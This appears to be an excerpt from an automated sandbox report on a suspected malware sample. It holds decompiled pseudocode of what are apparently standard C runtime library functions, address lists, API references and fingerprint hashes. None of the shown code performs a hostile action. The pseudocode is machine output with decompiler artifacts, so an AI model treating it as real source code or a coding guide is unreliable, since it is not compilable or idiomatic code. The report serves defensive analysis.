																		} while (_t87 != 0);
																		_t53 = _t130 - _t139 + 1; // 0x6
																		_v12 = _t53;
																		 *(_t110 + _t143) = E0041CA2B(_t53, 1);
																		E0041CA88(0);
																		_t162 = _t160 + 0xc;
																		__eflags =  *(_t110 + _t143);
																		if( *(_t110 + _t143) == 0) {
																			goto L58;
																		} else {
																			_t91 = E0041AF78( *(_t110 + _t143), _v12,  *_t143);
																			_t160 = _t162 + 0xc;
																			__eflags = _t91;
																			if(_t91 != 0) {
																				L59:
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				E00411D34();
																				asm("int3");
																				_t84 =  *0x43c898; // 0x58fc90
																				__eflags = _t84 -  *0x43c8a4; // 0x58fc90
																				if(__eflags == 0) {
																					_push(_t84);
																					L43();
																					 *0x43c898 = _t84;
																					return _t84;
																				}
																				return _t84;
																			} else {
																				goto L55;
																			}
																		}
																		goto L63;
																		L55:
																		_t143 = _t143 + 4;
																		_t130 =  *_t143;
																		__eflags = _t130;
																	} while (_t130 != 0);
																	goto L57;
																}
															}
														} else {
															_t86 = 0;
															__eflags = 0;
															L45:
															return _t86;
														}
													} else {
														asm("sbb eax, eax");
														 *(_v20 + 1 + _t149 - _a4 - 1) = _t110;
														__eflags = E00429993(_v20 + 1 + _t149 - _a4, _t139, __eflags, _t149,  ~_v5 & _v20 + 0x00000001 + _t149 - _a4);
														if(__eflags == 0) {
															_t98 = E00411DE1(__eflags);
															_t111 = _t110 | 0xffffffff;
															__eflags = _t111;
															 *_t98 = 0x2a;
														}
														goto L37;
													}
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L9:
									__eflags = _v5 - _t110;
									if(_v5 != _t110) {
										 *0x43c898 = E0041CA2B(1, 4);
										E0041CA88(_t110);
										_t158 = _t158 + 0xc;
										__eflags =  *0x43c898 - _t110; // 0x58fc90
										if(__eflags == 0) {
											L39:
											_t111 = _t110 | 0xffffffff;
											__eflags = _t111;
											goto L40;
										} else {
											__eflags =  *0x43c89c - _t110; // 0x0
											if(__eflags != 0) {
												goto L14;
											} else {
												 *0x43c89c = E0041CA2B(1, 4);
												E0041CA88(_t110);
												_t158 = _t158 + 0xc;
												__eflags =  *0x43c89c - _t110; // 0x0
												if(__eflags == 0) {
													goto L39;
												} else {
													goto L14;
												}
											}
										}
									} else {
										_t111 = 0;
										L40:
										E0041CA88(_t141);
										_t62 = _t111;
										goto L41;
									}
								} else {
									__eflags =  *0x43c89c - _t110; // 0x0
									if(__eflags == 0) {
										goto L9;
									} else {
										__eflags = L00419021();
										if(__eflags == 0) {
											goto L38;
										} else {
											L60();
											goto L14;
										}
									}
								}
							}
						}
					}
				} else {
					_t109 = E00411DE1(_t163);
					 *_t109 = 0x16;
					_t62 = _t109 | 0xffffffff;
					L41:
					return _t62;
				}
				L63:
			}

0x004233e4
0x004233e7
0x004233e9
0x004233ed
0x004233f0
0x004233f2
0x00423407
0x0042340c
0x0042340e
0x00423413
0x00423418
0x0042341a
0x004235fb
0x00423600
0x00000000
0x00423420
0x00423420
0x00423422
0x00000000
0x00423428
0x0042342b
0x0042342e
0x00423433
0x00423435
0x0042343b
0x004234b8
0x004234b8
0x004234bd
0x004234c0
0x004234c2
0x00000000
0x004234c8
0x004234cf
0x004234d4
0x004234d9
0x004234dc
0x004234de
0x0042352f
0x0042352f
0x00423532
0x00000000
0x00423538
0x00423538
0x0042353a
0x0042353d
0x0042353d
0x00423540
0x00423542
0x00000000
0x00423548
0x00423548
0x0042354e
0x00000000
0x00423554
0x0042355e
0x00423561
0x00423566
0x00423569
0x0042356c
0x0042356e
0x00000000
0x00423574
0x00423574
0x00423577
0x00423579
0x0042357c
0x00000000
0x0042357c
0x0042356e
0x0042354e
0x00423542
0x004234e0
0x004234e0
0x004234e2
0x00000000
0x004234e4
0x004234e7
0x004234ed
0x004234f0
0x004234f3
0x00423528
0x0042352a
0x004234f5
0x004234f5
0x00423502
0x00423502
0x00423505
0x00000000
0x00000000
0x004234fe
0x00423501
0x00423501
0x00423501
0x00423511
0x00423514
0x00423519
0x0042351c
0x0042351f
0x00423521
0x00423580
0x00423580
0x00423580
0x00423521
0x00423585
0x00423588
0x00000000
0x0042358a
0x0042358a
0x0042358d
0x0042358d
0x0042358f
0x00423590
0x00423590
0x0042359c
0x004235a4
0x004235a7
0x004235a8
0x004235aa
0x004235f2
0x004235f3
0x00000000
0x004235ac
0x004235b3
0x004235b8
0x004235bb
0x004235bd
0x00423617
0x00423618
0x00423619
0x0042361a
0x0042361b
0x0042361c
0x00423621
0x00423624
0x00423628
0x00423629
0x0042362c
0x0042362e
0x00423635
0x00423637
0x00423639
0x0042363b
0x0042363d
0x0042363d
0x00423640
0x00423641
0x00423641
0x0042363d
0x00423647
0x00423652
0x00423655
0x00423656
0x00423658
0x004236c0
0x004236c0
0x00000000
0x0042365a
0x0042365a
0x0042365c
0x0042365e
0x004236b0
0x004236b2
0x004236b8
0x00000000
0x00423660
0x00423660
0x00423663
0x00423663
0x00423665
0x00423665
0x00423665
0x00423668
0x00423668
0x0042366a
0x0042366b
0x0042366b
0x00423673
0x00423677
0x00423681
0x00423684
0x00423689
0x0042368c
0x00423690
0x00000000
0x00423692
0x0042369a
0x0042369f
0x004236a2
0x004236a4
0x004236c5
0x004236c7
0x004236c8
0x004236c9
0x004236ca
0x004236cb
0x004236cc
0x004236d1
0x004236d2
0x004236d7
0x004236dd
0x004236df
0x004236e0
0x004236e6
0x00000000
0x004236e6
0x004236eb
0x00000000
0x00000000
0x00000000
0x004236a4
0x00000000
0x004236a6
0x004236a6
0x004236a9
0x004236ab
0x004236ab
0x00000000
0x004236af
0x0042365e
0x00423630
0x00423630
0x00423630
0x00423632
0x00423634
0x00423634
0x004235bf
0x004235d0
0x004235d4
0x004235e0
0x004235e2
0x004235e4
0x004235e9
0x004235e9
0x004235ec
0x004235ec
0x00000000
0x004235e2
0x004235bd
0x004235aa
0x00423588
0x004234e2
0x004234de
0x0042343d
0x0042343d
0x00423440
0x0042345e
0x0042345e
0x00423461
0x00423474
0x00423479
0x0042347e
0x00423481
0x00423487
0x00423606
0x00423606
0x00423606
0x00000000
0x0042348d
0x0042348d
0x00423493
0x00000000
0x00423495
0x0042349f
0x004234a4
0x004234a9
0x004234ac
0x004234b2
0x00000000
0x00000000
0x00000000
0x00000000
0x004234b2
0x00423493
0x00423463
0x00423463
0x00423609
0x0042360a
0x00423611
0x00000000
0x00423613
0x00423442
0x00423442
0x00423448
0x00000000
0x0042344a
0x0042344f
0x00423451
0x00000000
0x00423457
0x00423457
0x00000000
0x00423457
0x00423451
0x00423448
0x00423440
0x0042343b
0x00423422
0x004233f4
0x004233f4
0x004233f9
0x004233ff
0x00423614
0x00423616
0x00423616
0x00000000

APIs

___from_strstr_to_strchr.LIBCMT ref: 0042340E
_free.LIBCMT ref: 004234E7
_free.LIBCMT ref: 00423514

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 247c69bed72e92cb6db01ee3c985359e902d6ac296262a8b62b1b3216f61d718
Instruction ID: ee0b68ebe3c207d0b00a076b1a2b61fd508427de2b237dc5a97cba8b1b20eb03
Opcode Fuzzy Hash: 247c69bed72e92cb6db01ee3c985359e902d6ac296262a8b62b1b3216f61d718
Instruction Fuzzy Hash: F45118B1B442257BDB21AF75B882AAE7BB8EF01316F40416FE50497341DA3D8B818B59

Uniqueness

Uniqueness Score: -1.00%

Function 0084364B Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00843675
_free.LIBCMT ref: 0084374E
_free.LIBCMT ref: 0084377B

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 247c69bed72e92cb6db01ee3c985359e902d6ac296262a8b62b1b3216f61d718
Instruction ID: 995be015dc2d12ebbaa0ea8643847a3e4bb7ae8ada48433bb618fc01ee7f7e3b
Opcode Fuzzy Hash: 247c69bed72e92cb6db01ee3c985359e902d6ac296262a8b62b1b3216f61d718
Instruction Fuzzy Hash: 1251C3B1904209AFDB24AFBD9C82A6DBBA4FF42314F14417EF554E7281EB358B44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1C5 Relevance: 12.2, APIs: 8, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0040D20E
__alloca_probe_16.LIBCMT ref: 0040D23A
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0040D279
LCMapStringEx.KERNEL32 ref: 0040D296
LCMapStringEx.KERNEL32 ref: 0040D2D5
__alloca_probe_16.LIBCMT ref: 0040D2F2
LCMapStringEx.KERNEL32 ref: 0040D334
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0040D357

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: 15e2146cc896ad87988c26445f06aa909ca948db1d1abd90d855564f64065547
Instruction ID: 8fb1fe1246298b6c3dce94e3e38e2aa6c7cc1485a8fea06ce4adb7840350b906
Opcode Fuzzy Hash: 15e2146cc896ad87988c26445f06aa909ca948db1d1abd90d855564f64065547
Instruction Fuzzy Hash: 43519172A00216ABEB205FE5CC45FAF7BA9EF44750F14413AFD14A62D0DB38DC198B99

Uniqueness

Uniqueness Score: -1.00%

Function 0082D8B7 Relevance: 12.1, APIs: 8, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(0043C4FC,00000FA0,?,?,0082D895), ref: 0082D8C3
GetModuleHandleW.KERNEL32(0042D100,?,?,0082D895), ref: 0082D8CE
GetModuleHandleW.KERNEL32(0042D144,?,?,0082D895), ref: 0082D8DF
GetProcAddress.KERNEL32(00000000,0042D160), ref: 0082D8F1
GetProcAddress.KERNEL32(00000000,0042D17C), ref: 0082D8FF
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0082D895), ref: 0082D922
RtlDeleteCriticalSection.NTDLL(0043C4FC), ref: 0082D93E
CloseHandle.KERNEL32(0043C4F8,?,?,0082D895), ref: 0082D94E

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID:
API String ID: 2565136772-0
Opcode ID: 35983cdb3e61cc380b173e4f72476b383ffd682be7a6ec163aa8f2d26186bbb9
Instruction ID: 2eeb8bf4ae18f56d34ec4e42c93957eb10dbc420a3a0aeb949c779efac328cc5
Opcode Fuzzy Hash: 35983cdb3e61cc380b173e4f72476b383ffd682be7a6ec163aa8f2d26186bbb9
Instruction Fuzzy Hash: F3015E71B40721ABDB301B65BC8EB3A3ED8EB45B817551431F900F3261DA68D8918AAD

Uniqueness

Uniqueness Score: -1.00%

Function 0041A6CC Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 255
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E0041A6CC(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				short _v706;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				intOrPtr _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int* _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				intOrPtr _v772;
				signed int _v784;
				void* __ebp;
				signed int _t156;
				void* _t163;
				signed int _t164;
				signed int _t166;
				signed int _t167;
				intOrPtr _t168;
				signed int _t171;
				signed int _t173;
				signed int _t174;
				signed int _t177;
				signed int _t179;
				signed int _t182;
				signed int _t183;
				signed int _t185;
				signed int _t186;
				signed int _t202;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t212;
				void* _t213;
				signed int _t220;
				intOrPtr* _t221;
				char* _t228;
				intOrPtr _t232;
				intOrPtr* _t233;
				signed int _t235;
				signed int _t240;
				signed int _t241;
				intOrPtr _t246;
				void* _t247;
				void* _t250;
				signed int _t252;
				signed int _t254;
				signed int _t257;
				signed int* _t258;
				short _t259;
				signed int _t260;
				void* _t262;
				void* _t263;
				void* _t264;

				_t244 = __edx;
				_t156 =  *0x43b054; // 0x41d6575c
				_v8 = _t156 ^ _t260;
				_push(__ebx);
				_t212 = _a8;
				_push(__esi);
				_push(__edi);
				_t246 = _a4;
				_v736 = _t212;
				_v732 = E0041B333(__ecx, __edx) + 0x278;
				_t163 = E00419DB7(_t212, __edx, _t246, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v716);
				_t263 = _t262 + 0x18;
				if(_t163 == 0) {
					L39:
					_t164 = 0;
					__eflags = 0;
					goto L40;
				} else {
					_t10 = _t212 + 2; // 0x2
					_t252 = _t10 << 4;
					_t166 =  &_v272;
					_v712 = _t252;
					_t244 =  *(_t252 + _t246);
					_t220 = _t244;
					while(1) {
						_v704 = _v704 & 0x00000000;
						_t254 = _v712;
						if( *_t166 !=  *_t220) {
							break;
						}
						if( *_t166 == 0) {
							L6:
							_t167 = _v704;
						} else {
							_t259 =  *((intOrPtr*)(_t166 + 2));
							_v706 = _t259;
							_t254 = _v712;
							if(_t259 !=  *((intOrPtr*)(_t220 + 2))) {
								break;
							} else {
								_t166 = _t166 + 4;
								_t220 = _t220 + 4;
								if(_v706 != 0) {
									continue;
								} else {
									goto L6;
								}
							}
						}
						L8:
						if(_t167 != 0) {
							_t221 =  &_v272;
							_t244 = _t221 + 2;
							do {
								_t168 =  *_t221;
								_t221 = _t221 + 2;
								__eflags = _t168 - _v704;
							} while (_t168 != _v704);
							_v708 = (_t221 - _t244 >> 1) + 1;
							_t171 = E0041D4FF(4 + ((_t221 - _t244 >> 1) + 1) * 2);
							_v724 = _t171;
							__eflags = _t171;
							if(_t171 == 0) {
								goto L39;
							} else {
								_v720 =  *((intOrPtr*)(_t254 + _t246));
								_v740 =  *(_t246 + 0xa0 + _t212 * 4);
								_v744 =  *(_t246 + 8);
								_t228 =  &_v272;
								_v728 = _t171 + 4;
								_t173 = E0041FC61(_t171 + 4, _v708, _t228);
								_t264 = _t263 + 0xc;
								__eflags = _t173;
								if(_t173 != 0) {
									_t174 = _v704;
									_push(_t174);
									_push(_t174);
									_push(_t174);
									_push(_t174);
									_push(_t174);
									E00411D34();
									asm("int3");
									_push(_t260);
									_push(_t228);
									_v784 = _v784 & 0x00000000;
									_t177 = E0041CFF1(_v772, 0x20001004,  &_v784, 2);
									__eflags = _t177;
									if(_t177 == 0) {
										L49:
										return 0xfde9;
									}
									_t179 = _v12;
									__eflags = _t179;
									if(_t179 == 0) {
										goto L49;
									}
									return _t179;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t254 + _t246)) = _v728;
									if(_v272 != 0x43) {
										L17:
										_t182 = E00419AD4(_t212, _t246,  &_v700);
										_t244 = _v704;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L17;
										} else {
											_t244 = _v704;
											_t182 = _t244;
										}
									}
									 *(_t246 + 0xa0 + _t212 * 4) = _t182;
									__eflags = _t212 - 2;
									if(_t212 != 2) {
										__eflags = _t212 - 1;
										if(_t212 != 1) {
											__eflags = _t212 - 5;
											if(_t212 == 5) {
												 *((intOrPtr*)(_t246 + 0x14)) = _v716;
											}
										} else {
											 *((intOrPtr*)(_t246 + 0x10)) = _v716;
										}
									} else {
										_t258 = _v732;
										 *(_t246 + 8) = _v716;
										_v708 = _t258[8];
										_t240 = _t258[9];
										_v716 = _t240;
										while(1) {
											__eflags =  *(_t246 + 8) -  *(_t258 + _t244 * 8);
											if( *(_t246 + 8) ==  *(_t258 + _t244 * 8)) {
												break;
											}
											_t210 =  *(_t258 + _t244 * 8);
											_t240 =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v708;
											 *(_t258 + 4 + _t244 * 8) = _v716;
											_t244 = _t244 + 1;
											_t212 = _v736;
											_v708 = _t210;
											_v716 = _t240;
											__eflags = _t244 - 5;
											if(_t244 < 5) {
												continue;
											} else {
											}
											L25:
											__eflags = _t244 - 5;
											if(__eflags == 0) {
												_t202 = E00420045(__eflags, _v704, 1, 0x42f510, 0x7f,  &_v528,  *(_t246 + 8), 1);
												_t264 = _t264 + 0x1c;
												__eflags = _t202;
												if(_t202 == 0) {
													_t241 = _v704;
												} else {
													_t204 = _v704;
													do {
														 *(_t260 + _t204 * 2 - 0x20c) =  *(_t260 + _t204 * 2 - 0x20c) & 0x000001ff;
														_t204 = _t204 + 1;
														__eflags = _t204 - 0x7f;
													} while (_t204 < 0x7f);
													_t206 = E0040F44A( &_v528,  *0x43b1c4, 0xfe);
													_t264 = _t264 + 0xc;
													__eflags = _t206;
													_t241 = 0 | _t206 == 0x00000000;
												}
												_t258[1] = _t241;
												 *_t258 =  *(_t246 + 8);
											}
											 *(_t246 + 0x18) = _t258[1];
											goto L37;
										}
										__eflags = _t244;
										if(_t244 != 0) {
											 *_t258 =  *(_t258 + _t244 * 8);
											_t258[1] =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v708;
											 *(_t258 + 4 + _t244 * 8) = _t240;
										}
										goto L25;
									}
									L37:
									_t183 = _t212 * 0xc;
									_t111 = _t183 + 0x42f598; // 0x409b00
									 *0x42c218(_t246);
									_t185 =  *((intOrPtr*)( *_t111))();
									_t232 = _v720;
									__eflags = _t185;
									if(_t185 == 0) {
										__eflags = _t232 - 0x43b290;
										if(_t232 == 0x43b290) {
											L44:
											_t186 = _v712;
										} else {
											_t257 = _t212 + _t212;
											__eflags = _t257;
											asm("lock xadd [eax], ecx");
											if(_t257 != 0) {
												goto L44;
											} else {
												E0041CA88( *((intOrPtr*)(_t246 + 0x28 + _t257 * 8)));
												E0041CA88( *((intOrPtr*)(_t246 + 0x24 + _t257 * 8)));
												E0041CA88( *(_t246 + 0xa0 + _t212 * 4));
												_t186 = _v712;
												_t235 = _v704;
												 *(_t186 + _t246) = _t235;
												 *(_t246 + 0xa0 + _t212 * 4) = _t235;
											}
										}
										_t233 = _v724;
										 *_t233 = 1;
										_t164 =  *(_t186 + _t246);
										 *((intOrPtr*)(_t246 + 0x28 + (_t212 + _t212) * 8)) = _t233;
									} else {
										 *((intOrPtr*)(_v712 + _t246)) = _t232;
										E0041CA88( *(_t246 + 0xa0 + _t212 * 4));
										 *(_t246 + 0xa0 + _t212 * 4) = _v740;
										E0041CA88(_v724);
										 *(_t246 + 8) = _v744;
										goto L39;
									}
									goto L40;
								}
							}
						} else {
							_t164 = _t244;
							L40:
							_pop(_t247);
							_pop(_t250);
							_pop(_t213);
							return E0040D3AF(_t164, _t213, _v8 ^ _t260, _t244, _t247, _t250);
						}
						goto L51;
					}
					asm("sbb eax, eax");
					_t167 = _t166 | 0x00000001;
					__eflags = _t167;
					goto L8;
				}
				L51:
			}

0x0041a6cc
0x0041a6d7
0x0041a6de
0x0041a6e1
0x0041a6e2
0x0041a6e5
0x0041a6e9
0x0041a6ea
0x0041a6ed
0x0041a6fd
0x0041a720
0x0041a725
0x0041a72a
0x0041a9e0
0x0041a9e0
0x0041a9e0
0x00000000
0x0041a730
0x0041a730
0x0041a733
0x0041a736
0x0041a73c
0x0041a742
0x0041a745
0x0041a747
0x0041a74a
0x0041a754
0x0041a75a
0x00000000
0x00000000
0x0041a760
0x0041a789
0x0041a789
0x0041a762
0x0041a762
0x0041a76a
0x0041a771
0x0041a777
0x00000000
0x0041a779
0x0041a779
0x0041a77c
0x0041a787
0x00000000
0x00000000
0x00000000
0x00000000
0x0041a787
0x0041a777
0x0041a796
0x0041a798
0x0041a7a1
0x0041a7a7
0x0041a7aa
0x0041a7aa
0x0041a7ad
0x0041a7b0
0x0041a7b0
0x0041a7c0
0x0041a7ce
0x0041a7d3
0x0041a7da
0x0041a7dc
0x00000000
0x0041a7e2
0x0041a7e8
0x0041a7f5
0x0041a7fe
0x0041a804
0x0041a811
0x0041a818
0x0041a81d
0x0041a820
0x0041a822
0x0041aa60
0x0041aa66
0x0041aa67
0x0041aa68
0x0041aa69
0x0041aa6a
0x0041aa6b
0x0041aa70
0x0041aa73
0x0041aa76
0x0041aa77
0x0041aa89
0x0041aa8e
0x0041aa90
0x0041aa99
0x00000000
0x0041aa99
0x0041aa92
0x0041aa95
0x0041aa97
0x00000000
0x00000000
0x0041aa9f
0x0041a828
0x0041a828
0x0041a836
0x0041a839
0x0041a84f
0x0041a856
0x0041a85b
0x0041a83b
0x0041a83b
0x0041a843
0x00000000
0x0041a845
0x0041a845
0x0041a84b
0x0041a84b
0x0041a843
0x0041a862
0x0041a869
0x0041a86c
0x0041a96a
0x0041a96d
0x0041a97a
0x0041a97d
0x0041a985
0x0041a985
0x0041a96f
0x0041a975
0x0041a975
0x0041a872
0x0041a872
0x0041a87e
0x0041a884
0x0041a88a
0x0041a88d
0x0041a893
0x0041a896
0x0041a899
0x00000000
0x00000000
0x0041a89b
0x0041a8a4
0x0041a8a8
0x0041a8b1
0x0041a8b5
0x0041a8b6
0x0041a8bc
0x0041a8c2
0x0041a8c8
0x0041a8cb
0x00000000
0x00000000
0x0041a8cd
0x0041a8ec
0x0041a8ec
0x0041a8ef
0x0041a90c
0x0041a911
0x0041a914
0x0041a916
0x0041a954
0x0041a918
0x0041a918
0x0041a91e
0x0041a923
0x0041a92b
0x0041a92c
0x0041a92c
0x0041a943
0x0041a94a
0x0041a94d
0x0041a94f
0x0041a94f
0x0041a95a
0x0041a960
0x0041a960
0x0041a965
0x00000000
0x0041a965
0x0041a8cf
0x0041a8d1
0x0041a8d6
0x0041a8dc
0x0041a8e5
0x0041a8e8
0x0041a8e8
0x00000000
0x0041a8d1
0x0041a988
0x0041a988
0x0041a98c
0x0041a994
0x0041a99a
0x0041a99d
0x0041a9a3
0x0041a9a5
0x0041a9f1
0x0041a9f7
0x0041aa43
0x0041aa43
0x0041a9f9
0x0041a9fe
0x0041a9fe
0x0041aa04
0x0041aa08
0x00000000
0x0041aa0a
0x0041aa0e
0x0041aa17
0x0041aa23
0x0041aa28
0x0041aa31
0x0041aa37
0x0041aa3a
0x0041aa3a
0x0041aa08
0x0041aa49
0x0041aa51
0x0041aa57
0x0041aa5a
0x0041a9a7
0x0041a9ad
0x0041a9b7
0x0041a9c9
0x0041a9d0
0x0041a9dd
0x00000000
0x0041a9dd
0x00000000
0x0041a9a5
0x0041a822
0x0041a79a
0x0041a79a
0x0041a9e2
0x0041a9e5
0x0041a9e6
0x0041a9e9
0x0041a9f0
0x0041a9f0
0x00000000
0x0041a798
0x0041a791
0x0041a793
0x0041a793
0x00000000
0x0041a793
0x00000000

APIs

Part of subcall function 0041B333: GetLastError.KERNEL32(00401A78,?,00401A7C,00411E51,?,00401A78,761B5970,?,0041B5E3,00000000,761B5970,00000000,00000000,00401A78), ref: 0041B338
Part of subcall function 0041B333: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0041B5E3,00000000,761B5970,00000000,00000000,00401A78), ref: 0041B3D6

_free.LIBCMT ref: 0041A9B7
_free.LIBCMT ref: 0041A9D0
_free.LIBCMT ref: 0041AA0E
_free.LIBCMT ref: 0041AA17
_free.LIBCMT ref: 0041AA23

Strings

C, xrefs: 0041A828

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: 6c6e31d95dfd4c97b4b8156b7557ab0fad028078123ad15772c9c8c539e0161f
Instruction ID: 03ec924348604807ed5e0f7d995d0b5a73aa1c445bae68dc2b545042ff798e2d
Opcode Fuzzy Hash: 6c6e31d95dfd4c97b4b8156b7557ab0fad028078123ad15772c9c8c539e0161f
Instruction Fuzzy Hash: 14B14C75A022199BDB24DF18C884BEAB3B4FF48314F5045AEE849A7351D734AEE1CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0083A933 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 255COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0083B59A: GetLastError.KERNEL32(00821CDF,?,00821CE3,008320B8,?,00821CDF,0042C0B4,?,0083B84A,00000000,0042C0B4,00000000,00000000,00821CDF), ref: 0083B59F
Part of subcall function 0083B59A: SetLastError.KERNEL32(00000000,0043B1C8,000000FF,?,0083B84A,00000000,0042C0B4,00000000,00000000,00821CDF), ref: 0083B63D

_free.LIBCMT ref: 0083AC1E
_free.LIBCMT ref: 0083AC37
_free.LIBCMT ref: 0083AC75
_free.LIBCMT ref: 0083AC7E
_free.LIBCMT ref: 0083AC8A

Strings

C, xrefs: 0083AA8F

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: e5c79b9b3d2b2f950bd4da3c1bc43b02f4dc0f36f9cde7f0a37a09167c10568a
Instruction ID: 01ab5656244dc39d593feb54c2be49d2aa4cf5c2e5ae9eaced85c0b0343ff458
Opcode Fuzzy Hash: e5c79b9b3d2b2f950bd4da3c1bc43b02f4dc0f36f9cde7f0a37a09167c10568a
Instruction Fuzzy Hash: 7EB15C759012199FDB28DF28C884BADB7B5FF88314F5045AAE849E7351E730AE90CF81

Uniqueness

Uniqueness Score: -1.00%

Function 0041F9D2 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0041F9D2(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				signed int _t49;
				void* _t51;
				signed int _t55;
				intOrPtr _t63;
				intOrPtr _t69;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr _t86;
				void* _t89;
				intOrPtr* _t91;
				intOrPtr _t93;
				void* _t94;
				void* _t95;
				signed int _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				void* _t103;

				_push(__ecx);
				_push(__ecx);
				_t41 =  *0x43b054; // 0x41d6575c
				_v8 = _t41 ^ _t96;
				_t93 = _a20;
				if(_t93 > 0) {
					_t69 = E0041845D(_a16, _t93);
					_t103 = _t69 - _t93;
					_t4 = _t69 + 1; // 0x1
					_t93 = _t4;
					if(_t103 >= 0) {
						_t93 = _t69;
					}
				}
				_t88 = _a32;
				if(_a32 == 0) {
					_t88 =  *((intOrPtr*)( *_a4 + 8));
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				_t86 = E0041E618(_t88, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t93, 0, 0);
				_t98 = _t97 + 0x18;
				_v12 = _t86;
				if(_t86 == 0) {
					L39:
					_pop(_t89);
					_pop(_t94);
					_pop(_t71);
					return E0040D3AF(_t46, _t71, _v8 ^ _t96, _t86, _t89, _t94);
				} else {
					_t17 = _t86 + _t86 + 8; // 0x8
					asm("sbb eax, eax");
					_t49 = _t86 + _t86 & _t17;
					if(_t49 == 0) {
						_t72 = 0;
						L15:
						if(_t72 == 0) {
							L37:
							_t95 = 0;
							L38:
							E0040D391(_t72);
							_t46 = _t95;
							goto L39;
						}
						_t51 = E0041E618(_t88, 1, _a16, _t93, _t72, _t86);
						_t100 = _t98 + 0x18;
						if(_t51 == 0) {
							goto L37;
						}
						_t90 = _v12;
						_t95 = E0041D12E(_a8, _a12, _t72, _v12, 0, 0, 0, 0, 0);
						if(_t95 == 0) {
							goto L37;
						}
						_t86 = 0x400;
						if((_a12 & 0x00000400) == 0) {
							_t31 = _t95 + _t95 + 8; // 0x8
							asm("sbb eax, eax");
							_t55 = _t95 + _t95 & _t31;
							if(_t55 == 0) {
								_t91 = 0;
								L31:
								if(_t91 == 0 || E0041D12E(_a8, _a12, _t72, _v12, _t91, _t95, 0, 0, 0) == 0) {
									L36:
									E0040D391(_t91);
									goto L37;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t95);
